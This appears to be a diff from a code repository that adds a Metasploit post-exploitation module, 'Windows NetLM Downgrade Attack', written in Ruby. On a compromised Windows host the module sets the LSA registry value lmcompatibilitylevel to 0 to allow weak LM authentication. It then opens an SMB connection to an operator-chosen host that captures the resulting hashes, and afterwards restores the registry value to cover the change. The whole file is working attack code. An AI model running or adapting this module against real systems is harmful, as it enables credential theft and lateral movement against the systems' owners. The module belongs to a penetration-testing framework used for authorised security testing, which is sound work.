|
| 1 | +## |
| 2 | +# $Id: netlm_downgrade.rb |
| 3 | +## |
| 4 | + |
| 5 | +## |
| 6 | +# This file is part of the Metasploit Framework and may be subject to |
| 7 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 8 | +# web site for more information on licensing and terms of use. |
| 9 | +# http://metasploit.com/ |
| 10 | +## |
| 11 | + |
| 12 | +require 'msf/core' |
| 13 | +require 'rex' |
| 14 | +require 'msf/core/post/windows/registry' |
| 15 | +require 'msf/core/post/windows/services' |
| 16 | +require 'msf/core/post/common' |
| 17 | + |
| 18 | +class Metasploit3 < Msf::Post |
| 19 | + |
| 20 | + include Msf::Post::Windows::Registry |
| 21 | + include Msf::Post::Windows::WindowsServices |
| 22 | + include Msf::Post::Common |
| 23 | + |
| 24 | + def initialize(info={}) |
| 25 | + super(update_info(info, |
| 26 | + 'Name' => 'Windows NetLM Downgrade Attack', |
| 27 | + 'Description' => %q{ This module will change a registry value to enable |
| 28 | + the sending of LM challange hashes and then initiate a SMB connection to |
| 29 | + the SMBHOST datastore. If an SMB server is listening, it will receive the |
| 30 | + NetLM hashes |
| 31 | + }, |
| 32 | + 'License' => MSF_LICENSE, |
| 33 | + 'Author' => [ 'Brandon McCann "zeknox" <bmccann [at] accuvant.com>', 'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'], |
| 34 | + 'SessionTypes' => [ 'meterpreter' ], |
| 35 | + 'References' => [ |
| 36 | + [ 'URL', 'http://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks'] |
| 37 | + ] |
| 38 | + )) |
| 39 | + |
| 40 | + register_options( |
| 41 | + [ |
| 42 | + OptString.new( 'SMBHOST', [ true, 'IP Address where SMB host is listening to capture hashes.' ]) |
| 43 | + ], self.class) |
| 44 | + end |
| 45 | + |
| 46 | + # method to make smb connection |
| 47 | + def smb_connect |
| 48 | + print_status("Establishing SMB connection to " + datastore['SMBHOST']) |
| 49 | + cmd_exec("cmd.exe","/c net use * \\\\#{datastore['SMBHOST']}\\ipc$") |
| 50 | + print_status("The SMBHOST should now have NetLM hashes") |
| 51 | + end |
| 52 | + |
| 53 | + # if netlm is disabled, enable it in the registry |
| 54 | + def run |
| 55 | + subkey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\" |
| 56 | + v_name = "lmcompatibilitylevel" |
| 57 | + netlm = registry_getvaldata(subkey, v_name) |
| 58 | + if netlm == 0 |
| 59 | + print_status("NetLM is already enabled on this system") |
| 60 | + |
| 61 | + # call smb_connect method to pass network hashes |
| 62 | + smb_connect |
| 63 | + else |
| 64 | + print_status("NetLM is Disabled: #{subkey}#{v_name} == #{netlm.to_s}") |
| 65 | + registry_setvaldata(subkey,v_name,0,"REG_DWORD") |
| 66 | + |
| 67 | + post_netlm = registry_getvaldata(subkey, v_name) |
| 68 | + print_good("NetLM is Enabled: #{subkey}#{v_name} == #{post_netlm.to_s}") |
| 69 | + |
| 70 | + # call smb_connect method to pass network hashes |
| 71 | + smb_connect |
| 72 | + |
| 73 | + # cleanup the registry |
| 74 | + registry_setvaldata(subkey,v_name,netlm,"REG_DWORD") |
| 75 | + print_status("Cleanup Completed: #{subkey}#{v_name} == #{netlm.to_s}") |
| 76 | + end |
| 77 | + end |
| 78 | +end |
| 79 | + |
0 commit comments